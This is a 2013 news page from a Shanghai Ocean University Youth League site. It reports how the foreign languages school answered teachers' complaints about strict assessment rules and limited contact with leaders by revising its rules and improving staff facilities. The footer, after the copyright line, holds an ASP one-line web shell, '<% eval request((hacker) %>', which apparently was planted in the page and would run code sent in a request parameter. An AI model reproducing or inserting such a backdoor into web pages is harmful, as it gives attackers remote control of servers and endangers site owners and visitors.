当前位置:共青团上海海洋大学委员会 >> 理论学习 >> 时政热点 >> 正文  
站内信息搜索:
“即知即改”系列报道之九:外国语学院“即知即改”成效明显
[2013年11月15日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    党 的群众路线教育实践活动开展以来,外国语学院按照学校党委的安排,深入基层、深入教职工,不断听取意见与建议,着力整改。外国语学院负责人介绍,部分外国语学院教师认为学院的管理制度、分配办法、教学科研的考核等事项颇为严苛,而外国语学院的教师普遍每周有十多节课,平时工作都比较忙,十分辛苦,不太适应学院严厉的考核制度。部分教师认为,学院领导与基层教职工的交流较少,对于基层工作不够了解,也导致在学院的管理制度、考核办法等的制定上留有疏漏。

    针对于该情况,学院领导也开始广泛征求教职工意见,着手修订学院的管理与教研考核制度,并加大加强与基层教职工的交流,充分发挥群众意见,力求做到真正意义上的民主决策。为方便教职工的工作,外国语学院对教学楼的休息室的开放、饮水机的使用也进行了更为细心的调整。同时,面对教师关于教室应装配台式电脑方便工作的呼吁,外国语学院也在积极与学校的相关部门进行反映,沟通筹措。

    外国语学院积极改革工作作风,立足于群众,加大与基础教职工的交流沟通,倾听教师意见,为他们的工作提供更多便利,让学院的管理与决策更民主化科学化,得到了广大师生的高度评价。

 

关闭窗口

上一篇:“即知即改”系列报道之八:修订议事规则,为会议瘦身

下一篇:“即知即改”系列报道之十:加强管理,注重引导,推进学风建设
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>